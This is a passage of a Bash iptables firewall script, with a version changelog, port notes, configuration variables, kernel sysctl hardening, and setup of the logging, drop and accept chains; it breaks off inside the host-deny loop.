# Fix the SSR SysCtl loop |
# Remove stateful match from forward chain |
# version 2.3.7-pre5: Make the default policy actually be DROP |
# instead of just saying it is |
# Add stateful matching to forward chain to |
# prevent people from routing onto your |
# internal network (please tell me if |
# breaks anything). Thanks to Martin |
# Mosny for noticing this |
# Block Source Routed Packets to help with |
# the above problem |
# Add option for TCP SynCookies on or off |
# Fix BLACKHOLE directive (was being applied |
# to INPUT/OUTPUT after the jump for |
# INETIN/INETOUT so didn't apply for |
# the internet). Thanks to Gerry Doris |
# for noticing this |
# Add DHCP client to default UDP port allows |
# Note email address change |
# Changed emphesis in comments |
# Forwarding of port ranges (Vinny and Eddie) |
# version 2.3.7-pre4: Line 414, missing subnet match caused all |
# packets from anywhere to be allowed. |
# Fixed. |
# version 2.3.7-pre3: Fix missing fi (fatal syntax error) |
# Fix logging in TCPACCEPT chain |
# version 2.3.7-pre2: Add route verification (thanks to Jeremy |
# Frank) |
# Add blackhole directive |
# Updated configuration sanity checks |
# Ripped out SSH Stuff as it isn't needed |
# True default DROP on INPUT |
# Don't run the INTERNAL_LAN loop if no nets |
# Upped the default SYN limit as large |
# numbers of small FTP transfers would |
# overload it quickly |
# Form cleanups |
# version 2.3.7-pre1: Maybe the FTP will work now (fixes for the |
# RELATED state) |
# Now works with both LAN and DMZ iface null |
# Moved static NAT to stable options |
# Change parser to /bin/bash not /bin/sh |
# version 2.3.6: Add TTL mangling |
# Added some more EFNet servers to the list |
# Fix in the DMZOUT chain |
# Fix FTP stuff |
# version 2.3.5: Fixes to make port forwarding work again |
# version 2.3.4: USE_MASQ has been changed to MASQ_LAN in port fw |
# Fix syntax error in TCP port forwards |
# General cleanup |
# Fixes in port forwarding |
# It's LTREJECT, not TLREJECT |
# More TOS mangling |
# version 2.3.3: Fatal syntax error in IP forward detect fix |
# Don't bail on no IP forward for no LAN |
# version 2.3.3-pre1: Reject with tcp-reset for TCP option |
# Removed the huge list of censorship |
# Moved the port forwards to stable options |
# Moved the TOS mangling to stable options |
# Check before enabling IP Forwarding and |
# IP SynCookies |
# Don't run censorship loop if no rules |
# Request low latency TOS on UDP packets for |
# games on ports 4000-7000 (Diablo II) |
# Fix bad syntax in the port forwarding loops |
# Reversed DMZIN and DMZOUT fixed |
# Various syntax fixes |
# Stateful inspection on forward chain |
# Other stateful matching changes |
# version 2.3.2: Fixed bad syntax in DMZ_IFACE loop |
# version 2.3.2-pre2: Put a real liscense on it (BSD liscense) |
# Changed format of ALLOW_HOSTWISE and |
# DENY_HOSTWISE to be less confusing |
# (the ":" was changed to ">") |
# Added LOG_FLOOD option to tweak log limit |
# Added SYN_FLOOD option to tweak SYN limit |
# Added PING_FLOOD option to tweak PING limit |
# version 2.3.2-pre1: Stateful matching on active FTP and SSH |
# rules (thanks to Len Padilla) |
# Fixed a minor bug in chain creation order |
# (thanks to Peter Lindman) |
# TOS Optimizations (thanks to vesa alatalo) |
# Begin DMZ Support |
# Proofread comments and correct |
# Use BASH builtins instead of sed |
# (thanks to Craig Ludington) |
# Fixed "USE_SNAT" bug in port forwarding |
# (has been changed to "SNAT_LAN") |
# (thanks to Frdric Marchand) |
# Tuned down default TCP allows (remove POP3) |
# version 2.3.1: Option for 1:1 or subnet:1 static NAT |
# Internet censorship options |
# version 2.3.1-pre2: Added option to deny specific ports from |
# specific hosts |
# Added limiting to logging chains to prevent |
# log DoSing |
# Spiffed up comments |
# Changed the "AUTH_ALLOW" and "DNS" options |
# to be more generic and flexible |
# version 2.3.1-pre1: Updated comments for new kernel version |
# Removed double drop setting |
# Updated for iptables-1.2 |
# Began a kernel option list |
# version 2.3.0: No changes from pre1g |
# version 2.3.0-pre1g: Tuned down default TCP allows |
# Restructure to SSH loop |
# Status Reporting Fixes (newlines, etc.) |
# Fix log prefix length on accept loops |
# version 2.3.0-pre1f: Moved the ICMP echo-request limit to where |
# it should have been |
# Allows the rest of the ICMP like it should |
# Remove the interface matching from ICMP |
# echo-request (not needed) |
# version 2.3.0-pre1e: Fixed an issue in the invalid matching |
# version 2.3.0-pre1d: Spiffed up comments |
# Port Forwarding |
# Moved the deny setting to normal options |
# version 2.3.0-pre1c: Minor fixes that don't (currently) affect |
# functionality |
# version 2.3.0-pre1b: Security fix documented in 2.1.13 |
# Slight logic change in TCP_ALLOW loop |
# Don't print allow messages if nothign is |
# allowed by that loop |
# Changed IPTables download URL |
# version 2.3.0-pre1a: Initial branch from 2.1.12 |
# Add stuff in release notes except port fw |
# ----------------------------------------------------------------------|
# You NEED to set this! |
# Configuration follows: |
# |
# Main configuration, modify to suit your setup. Help can be found at:
# -------------------------------------------------------------------------
# |!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!|
# |!*********************************************************************!|
# |!*** http://www.mplug.org/phpwiki/index.php?MonMothaReferenceGuide ***!|
# |!*********************************************************************!|
# |!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!|
# -------------------------------------------------------------------------
# --------------------------READ THE URL ABOVE!----------------------------
# -------------------------------------------------------------------------
### BEGIN INIT INFO
# Provides: transparentproxy
# Required-Start: $local_fs $syslog $remote_fs dbus
# Required-Stop: $local_fs $syslog $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start transparentproxy
### END INIT INFO
# Port Maps
# TCP
# 22 = SSH
# 21 = FTP
# 25 = SMTP
# 80 = HTTP
# 113 = AUTH
# 1723 = PPTP
# 5631 = PcAnywhere DATA
# 522 = NetMeeting 'User Location Server'
# 389 = NetMeeting 'Internet Locator Server'
# 1503 = NetMeeting 'T.120'
# 1718 = NetMeeting/H323 'GateDiscovery'
# 1719 = NetMeeting/H323 'RAS/GateStatus'
# 1720 = NetMeeting/H323 'H.323 call setup/HostCall'
# 1731 = NetMeeting 'Audio call control'
# 1723 = PPTP MS
# 1002 =
# 2345 = LDAP2 Server for NetMeeting ILS
# 39000:39001 = GNU H323 Proxy Gateway 'T120PortRange'
# 5000:5004 = GNU H323 Proxy Gateway 'H.245 Tunneling '
# 5120:5220 = NeverWinterNights Linux Server
# 30000:30010 = GNU H323 Proxy Gateway 'H.245 channel'
# 20000:20020 = GNU H323 Proxy Gateway 'Q931PortRange'
# 40000:40001 = TeamSound
# 5222 = Jabber Server
# 5269 = Jabber Server
# UDP
# 21 = FTP
# 22 = SSH
# 25 = SMTP
# 80 = HTTP
# 113 = AUTH
# 68 = BOOTPC
# 6112 = Xwindows??
# 6119 = Xwindows??
# 4000 = ICQ??
# 1718:1723 = Netmeeting
# 1723 = PPTP MS
# 5631 = PcAnywhere
# 389 = NetMeeting 'Internet Locator Server'
# 5120:5220 = NeverWinterNights Linux Server
# 6500 = NeverWinterNights
# 27900 = NeverWinterNights
# 28900 = NeverWinterNights
# 40011:40200 = TeamSound
# 40002:40004 = TeamSound
# 5000:5004 = GNU H323 Proxy Gateway 'H.245 Tunneling'
# 5222 = Jabber Server
# 5269 = Jabber Server
# Main Options
IPTABLES="/sbin/iptables"
TCP_ALLOW="20 21 22 25 80 113 1723 1701 500 4000 4662 6666"
UDP_ALLOW="20 21 22 25 80 113 1723 1701 500 68 4000 6112 6119 7383 6666"
INET_IFACE="eth1"
LAN_IFACE="eth2"
INTERNAL_LAN="192.168.42.0/24"
MASQ_LAN="192.168.42.0/24"
SNAT_LAN=""
DROP="TREJECT"
DENY_ALL=""
DENY_HOSTWISE_TCP=""
DENY_HOSTWISE_UDP=""
BLACKHOLE=""
BLACKHOLE_DROP="DROP"
ALLOW_HOSTWISE_TCP="64.201.177.23/0>143"
ALLOW_HOSTWISE_UDP="64.201.177.23/0>143"
TCP_FW="4662:4662>192.168.0.2"
UDP_FW="7383:7383>192.168.0.2"
MANGLE_TOS_OPTIMIZE="FALSE"
DHCP_SERVER="TRUE"
BAD_ICMP="5 9 10 15 16 17 18"
ENABLE="Y"
# Flood Params
LOG_FLOOD="2/s"
SYN_FLOOD="20/s"
PING_FLOOD="1/s"
# Outbound filters
# FIXME: Update config help wiki then remove one-liner help
ALLOW_OUT_TCP="" # Internal hosts allowed to be forwarded out on TCP (do not put this/these host/s in INTERNAL_LAN, but do define their method of access [snat, masq] if not a public ip)
PROXY="" # Redirect for Squid or other TRANSPARENT proxy. Syntax to specify the proxy is "host:port".
MY_IP="" # Set to the internal IP of this box (with the firewall), only needed for PROXY=
# Below here is experimental (please report your successes/failures)
MAC_MASQ="" # Currently Broken
MAC_SNAT="" # Ditto...
TTL_SAFE=""
USE_SYNCOOKIES="FALSE"
RP_FILTER="TRUE"
ACCEPT_SOURCE_ROUTE="FALSE"
SUPER_EXEMPT=""
BRAINDEAD_ISP="FALSE"
ALLOW_HOSTWISE_PROTO="0/0>47 0/0>50 0/0>51"
# Only touch these if you're daring (PREALPHA stuff, as in basically non-functional)
DMZ_IFACE="" # Interface your DMZ is on (leave blank if you don't have one) - Obsolete: Will be removed before 2.4.0
# ----------------------------------------------------------------------|
# These control basic script behavior; there should be no need to |
# change any of these settings for normal use. |
# ----------------------------------------------------------------------|
FILTER_CHAINS="INETIN INETOUT DMZIN DMZOUT TCPACCEPT UDPACCEPT LDROP LREJECT LTREJECT TREJECT"
UL_FILTER_CHAINS="ULDROP ULREJECT ULTREJECT"
LOOP_IFACE="lo"
# Colors
NORMAL="\033[0m"
GREEN=$'\e[32;01m'
YELLOW=$'\e[33;01m'
RED=$'\e[31;01m'
NORMAL=$'\e[0m'
# Undocumented Features
OVERRIDE_NO_FORWARD="FALSE"
OVERRIDE_SANITY_CHECKS="FALSE"
# ----------------------------------------------------------------------|
# You shouldn't need to modify anything below here |
# Main Script Starts |
# ----------------------------------------------------------------------|
# Let's load it!
echo "Loading iptables firewall:"
modprobe ip_conntrack_ftp ports=6666
modprobe ip_nat_ftp ports=6666
# Configuration Sanity Checks
echo -n "Checking configuration..."
if [ "$OVERRIDE_SANITY_CHECKS" = "TRUE" ] ; then
echo "skipped! If it breaks, don't complain!"
echo "If there's a reason you needed to do this, please report to the developers list!"
echo
echo -n "Wait 5 seconds..."
sleep 5
echo "continuing"
echo
echo
else
# Has it been configured?
if ! [ "$ENABLE" = "Y" ] ; then
echo
echo "${RED}You need to *EDIT YOUR CONFIGURATION* and set ENABLE to Y!"
echo "${YELLOW}End User Liscense Agreement:${NORMAL}"
echo -n "$GREEN"
cat << EOF
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1.Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2.Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3.The name of the author may not be used to endorse or promote
products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
EOF
echo "${RED}You need to *EDIT YOUR CONFIGURATION* and set ENABLE to Y!${NORMAL}"
exit 99
fi
# It's hard to run an iptables script without iptables...
if ! [ -x $IPTABLES ] ; then
echo
echo "ERROR IN CONFIGURATION: ${IPTABLES} doesn't exist or isn't executable!"
exit 4
fi
# Basic interface sanity
for dev in ${LAN_IFACE} ; do
if [ "$dev" = "${DMZ_IFACE}" ] && [ "$dev" != "" ]; then
echo
echo "ERROR IN CONFIGURATION: DMZ_IFACE and LAN_IFACE can't have a duplicate interface!"
exit 1
fi
done
# Create a test chain to work with for system ablilities testing
${IPTABLES} -N SYSTEST
if [ "$?" != "0" ] ; then
echo
echo "IPTABLES can't create new chains or the script was interrupted previously!"
echo "Flush IPTABLES rulesets and chains and try again."
exit 4
fi
# Check for ULOG support
${IPTABLES} -A SYSTEST -j ULOG > /dev/null 2>&1
if [ "$?" = "0" ] ; then
HAVE_ULOG="true"
else
HAVE_ULOG="false"
fi
# Check for LOG support
${IPTABLES} -A SYSTEST -j LOG > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Your kernel lacks LOG support reqiored by this script. Aborting."
exit 3
fi
# Check for stateful matching
${IPTABLES} -A SYSTEST -m state --state ESTABLISHED -j ACCEPT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Your kernel lacks stateful matching, this would break this script. Aborting."
exit 3
fi
# Check for the limit match
${IPTABLES} -A SYSTEST -m limit -j ACCEPT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Support not found for limiting needed by this script. Aborting."
exit 3
fi
# Check for REJECT
${IPTABLES} -A SYSTEST -j REJECT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Support not found for the REJECT target needed by this script. Aborting."
exit 3
fi
# Check DROP sanity
if [ "$DROP" = "" ] ; then
echo
echo "There needs to be a DROP policy (try TREJECT)!"
exit 1
fi
if [ "$DROP" = "ACCEPT" ] ; then
echo
echo "The DROP policy is set to ACCEPT; there is no point in loading the firewall as there wouldn't be one."
exit 2
fi
if [ "$DROP" = "ULDROP" ] || [ "$DROP" = "ULREJECT" ] || [ "$DROP" = "ULTREJECT" ] ; then
if [ "$HAVE_ULOG" != "true" ] ; then
echo
echo "You have selected a ULOG policy, but your system lacks ULOG support."
echo "Please choose a policy that your system has support for."
exit 5
fi
fi
# Problems with blackholes?
if [ "$BLACKHOLE" != "" ] && [ "$BLACKHOLE_DROP" = "" ] ; then
echo
echo "You can't use blackholes and not have a policy for them!"
exit 1
fi
# Flush and remove the chain SYSTEST
${IPTABLES} -F SYSTEST
${IPTABLES} -X SYSTEST
# Seems ok...
echo "passed"
fi #from override option
# ===============================================
# ----------------Preprocessing------------------
# ===============================================
# Turn TCP_ALLOW and UDP_ALLOW into ALLOW_HOSTWISE
# TCP_ALLOW/UDP_ALLOW are plain port lists; each port is rewritten to the
# "source>port" hostwise syntax with a wildcard source (0/0 = any host) and
# appended to the corresponding ALLOW_HOSTWISE_* list, so later rule loops
# only have to handle one format.
# Note: ${TCP_ALLOW}/${UDP_ALLOW} are deliberately unquoted — word splitting
# on whitespace is how the space-separated port list is iterated.
echo -n "Performing TCP_ALLOW and UDP_ALLOW alias preprocessing..."
if [ "$TCP_ALLOW" != "" ] ; then
for rule in ${TCP_ALLOW} ; do
ALLOW_HOSTWISE_TCP="${ALLOW_HOSTWISE_TCP} 0/0>$rule"
done
fi
if [ "$UDP_ALLOW" != "" ] ; then
for rule in ${UDP_ALLOW} ; do
ALLOW_HOSTWISE_UDP="${ALLOW_HOSTWISE_UDP} 0/0>$rule"
done
fi
echo "done"
# ===============================================
# -------Set some Kernel stuff via SysCTL--------
# ===============================================
# Turn on IP forwarding
# Forwarding is only enabled when there is actually a LAN to route for
# (INTERNAL_LAN set) and the undocumented override is not active; writing
# 1 to the proc file enables kernel IPv4 routing immediately.
if [ "$INTERNAL_LAN" != "" ] && [ "$OVERRIDE_NO_FORWARD" != "TRUE" ] ; then
echo -n "Checking IP Forwarding..."
if [ -e /proc/sys/net/ipv4/ip_forward ] ; then
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "enabled."
else
# proc entry missing: kernel lacks (or hides) IPv4 forwarding support.
echo "support not found! This will cause problems if you need to do any routing."
fi
fi
# Enable TCP Syncookies
# Syncookies are explicitly written as 1 or 0 according to USE_SYNCOOKIES,
# so a value left over from boot defaults is always overridden either way.
echo -n "Checking IP SynCookies..."
if [ -e /proc/sys/net/ipv4/tcp_syncookies ] ; then
if [ "$USE_SYNCOOKIES" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo "enabled."
else
echo 0 > /proc/sys/net/ipv4/tcp_syncookies
echo "disabled."
fi
else
# Kernel built without syncookie support; harmless, nothing to set.
echo "support not found, but that's OK."
fi
# Enable Route Verification to prevent martians and other such crud that
# seems to be commonplace on the internet today
echo -n "Checking Route Verification..."
if [ "$INET_IFACE" != "" ] ; then
for dev in ${INET_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "activated:$dev "
else
echo 0 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "disabled:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$LAN_IFACE" != "" ] ; then
for dev in ${LAN_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "activated:$dev "
else
echo 0 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "disabled:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$DMZ_IFACE" != "" ] ; then
if [ -e /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter
echo -n "activated:${DMZ_IFACE} "
else
echo 0 > /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter
echo -n "disabled:${DMZ_IFACE} "
fi
else
echo "not found:${DMZ_IFACE} "
fi
fi
echo
# Tell the Kernel to Ignore Source Routed Packets
echo -n "Refusing Source Routed Packets via SysCtl..."
if [ "$INET_IFACE" != "" ] ; then
for dev in ${INET_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "disabled:$dev "
else
echo "0" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "activated:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$LAN_IFACE" != "" ] ; then
for dev in ${LAN_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "disabled:$dev "
else
echo "0" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "activated:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$DMZ_IFACE" != "" ] ; then
if [ -e /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route
echo -n "disabled:${DMZ_IFACE} "
else
echo "0" > /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route
echo -n "activated:${DMZ_IFACE} "
fi
else
echo "not found:${DMZ_IFACE} "
fi
fi
echo
# ===============================================
# --------Actual NetFilter Stuff Follows---------
# ===============================================
# Flush everything
# If you need compatability, you can comment some or all of these out,
# but remember, if you re-run it, it'll just add the new rules in, it
# won't remove the old ones for you then, this is how it removes them.
echo -n "Flush: "
${IPTABLES} -t filter -F INPUT
echo -n "INPUT "
${IPTABLES} -t filter -F OUTPUT
echo -n "OUTPUT1 "
${IPTABLES} -t filter -F FORWARD
echo -n "FORWARD "
${IPTABLES} -t nat -F PREROUTING
echo -n "PREROUTING1 "
${IPTABLES} -t nat -F OUTPUT
echo -n "OUTPUT2 "
${IPTABLES} -t nat -F POSTROUTING
echo -n "POSTROUTING "
${IPTABLES} -t mangle -F PREROUTING
echo -n "PREROUTING2 "
${IPTABLES} -t mangle -F OUTPUT
echo -n "OUTPUT3"
echo
# Create new chains
# Output to /dev/null in case they don't exist from a previous invocation
echo -n "Creating chains: "
for chain in ${FILTER_CHAINS} ; do
${IPTABLES} -t filter -F ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -X ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -N ${chain}
echo -n "${chain} "
done
if [ ${HAVE_ULOG} = "true" ] || [ ${HAVE_ULOG} = "" ] ; then
for chain in ${UL_FILTER_CHAINS} ; do
${IPTABLES} -t filter -F ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -X ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -N ${chain}
echo -n "${chain} "
done
fi
echo
# Default Policies
# INPUT policy is drop as of 2.3.7-pre5
# Policy can't be reject because of kernel limitations
echo -n "Default Policies: "
${IPTABLES} -t filter -P INPUT DROP
echo -n "INPUT:DROP "
${IPTABLES} -t filter -P OUTPUT ACCEPT
echo -n "OUTPUT:ACCEPT "
${IPTABLES} -t filter -P FORWARD DROP
echo -n "FORWARD:DROP "
echo
# ===============================================
# -------Chain setup before jumping to them------
# ===============================================
#These logging chains are valid to specify in DROP= above
#Set up LDROP: rate-limited kernel log per protocol, then a hard DROP.
echo -n "Setting up drop chains chains: "
${IPTABLES} -t filter -A LDROP -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Dropped "
${IPTABLES} -t filter -A LDROP -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Dropped "
${IPTABLES} -t filter -A LDROP -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Dropped "
${IPTABLES} -t filter -A LDROP -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Dropped "
${IPTABLES} -t filter -A LDROP -j DROP
echo -n "LDROP "
#And LREJECT too
${IPTABLES} -t filter -A LREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Rejected "
${IPTABLES} -t filter -A LREJECT -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Rejected "
${IPTABLES} -t filter -A LREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Rejected "
${IPTABLES} -t filter -A LREJECT -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Rejected "
${IPTABLES} -t filter -A LREJECT -j REJECT
echo -n "LREJECT "
#Don't forget TREJECT: "tidy" rejects -- TCP gets an RST, UDP a port-unreachable,
#ICMP is silently dropped, anything else gets the default reject.
${IPTABLES} -t filter -A TREJECT -p tcp -j REJECT --reject-with tcp-reset
${IPTABLES} -t filter -A TREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
${IPTABLES} -t filter -A TREJECT -p icmp -j DROP
${IPTABLES} -t filter -A TREJECT -j REJECT
echo -n "TREJECT "
#And LTREJECT: log like LREJECT, then hand off to TREJECT for the actual reject.
${IPTABLES} -t filter -A LTREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Rejected "
${IPTABLES} -t filter -A LTREJECT -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Rejected "
${IPTABLES} -t filter -A LTREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Rejected "
${IPTABLES} -t filter -A LTREJECT -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Rejected "
${IPTABLES} -t filter -A LTREJECT -j TREJECT
echo -n "LTREJECT "
#And ULOG stuff, same as above but ULOG instead of LOG
# BUG FIX: quote ${HAVE_ULOG} -- unquoted, an empty value broke the test
# (same defect as in the chain-creation section above).
if [ "${HAVE_ULOG}" = "true" ] || [ "${HAVE_ULOG}" = "" ] ; then
${IPTABLES} -t filter -A ULDROP -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_TCP
${IPTABLES} -t filter -A ULDROP -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_UDP
${IPTABLES} -t filter -A ULDROP -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_ICMP
${IPTABLES} -t filter -A ULDROP -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_FRAG
${IPTABLES} -t filter -A ULDROP -j DROP
echo -n "ULDROP "
${IPTABLES} -t filter -A ULREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_TCP
${IPTABLES} -t filter -A ULREJECT -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_UDP
# BUG FIX: this ICMP rule logged with the copy-pasted prefix LREJECT_UDP;
# corrected to LREJECT_ICMP so ulogd records the right message type.
${IPTABLES} -t filter -A ULREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_ICMP
${IPTABLES} -t filter -A ULREJECT -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_FRAG
${IPTABLES} -t filter -A ULREJECT -j REJECT
echo -n "ULREJECT "
${IPTABLES} -t filter -A ULTREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_TCP
${IPTABLES} -t filter -A ULTREJECT -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_UDP
${IPTABLES} -t filter -A ULTREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_ICMP
${IPTABLES} -t filter -A ULTREJECT -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_FRAG
${IPTABLES} -t filter -A ULTREJECT -p tcp -j REJECT --reject-with tcp-reset
${IPTABLES} -t filter -A ULTREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
${IPTABLES} -t filter -A ULTREJECT -p icmp -j DROP
${IPTABLES} -t filter -A ULTREJECT -j REJECT
echo -n "ULTREJECT "
fi
#newline
echo
# Set up the per-proto ACCEPT chains
echo -n "Setting up per-proto ACCEPT: "
# TCPACCEPT
# SYN Flood "Protection": new connections (SYN) are accepted only up to
# ${SYN_FLOOD}; above that they are logged (rate-limited) and dropped.
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -m limit --limit ${SYN_FLOOD} -j ACCEPT
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Possible SynFlood "
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -j ${DROP}
# Non-SYN TCP (established traffic) is accepted without rate limiting.
${IPTABLES} -t filter -A TCPACCEPT -p tcp ! --syn -j ACCEPT
# Log anything that hasn't matched yet and ${DROP} it since it isn't TCP and shouldn't be here
${IPTABLES} -t filter -A TCPACCEPT -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Mismatch in TCPACCEPT "
${IPTABLES} -t filter -A TCPACCEPT -j ${DROP}
echo -n "TCPACCEPT "
#UDPACCEPT
${IPTABLES} -t filter -A UDPACCEPT -p udp -j ACCEPT
# Log anything not UDP and ${DROP} it since it's not supposed to be here
${IPTABLES} -t filter -A UDPACCEPT -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Mismatch on UDPACCEPT "
${IPTABLES} -t filter -A UDPACCEPT -j ${DROP}
echo -n "UDPACCEPT "
#Done
echo
# =================================================
# -------------------Exemptions--------------------
# =================================================
# SUPER_EXEMPT hosts bypass all filtering in every direction.
if [ "$SUPER_EXEMPT" != "" ] ; then
echo -n "Super Exemptions: "
for host in ${SUPER_EXEMPT} ; do
${IPTABLES} -t filter -A INPUT -s ${host} -j ACCEPT
${IPTABLES} -t filter -A OUTPUT -d ${host} -j ACCEPT
${IPTABLES} -t filter -A FORWARD -s ${host} -j ACCEPT
${IPTABLES} -t filter -A FORWARD -d ${host} -j ACCEPT
echo -n "${host} "
done
echo
fi
# =================================================
# ----------------Explicit Denies------------------
# =================================================
#Blackholes will not be overridden by hostwise allows
# (they are appended before the allow rules, so they match first).
if [ "$BLACKHOLE" != "" ] ; then
echo -n "Blackholes: "
for host in ${BLACKHOLE} ; do
${IPTABLES} -t filter -A INPUT -s ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A OUTPUT -d ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A FORWARD -s ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A FORWARD -d ${host} -j ${BLACKHOLE_DROP}
echo -n "${host} "
done
echo
fi
# DENY_ALL rules look like "src" or "src<dst" (the '<' separates an optional
# destination). The braces run in a subshell, so the parsed vars stay local.
if [ "$DENY_ALL" != "" ] ; then
echo -n "Denying hosts: "
for rule in ${DENY_ALL} ; do
echo "$rule" | {
IFS='<' read shost dhost
if [ "$dhost" == "" ] ; then
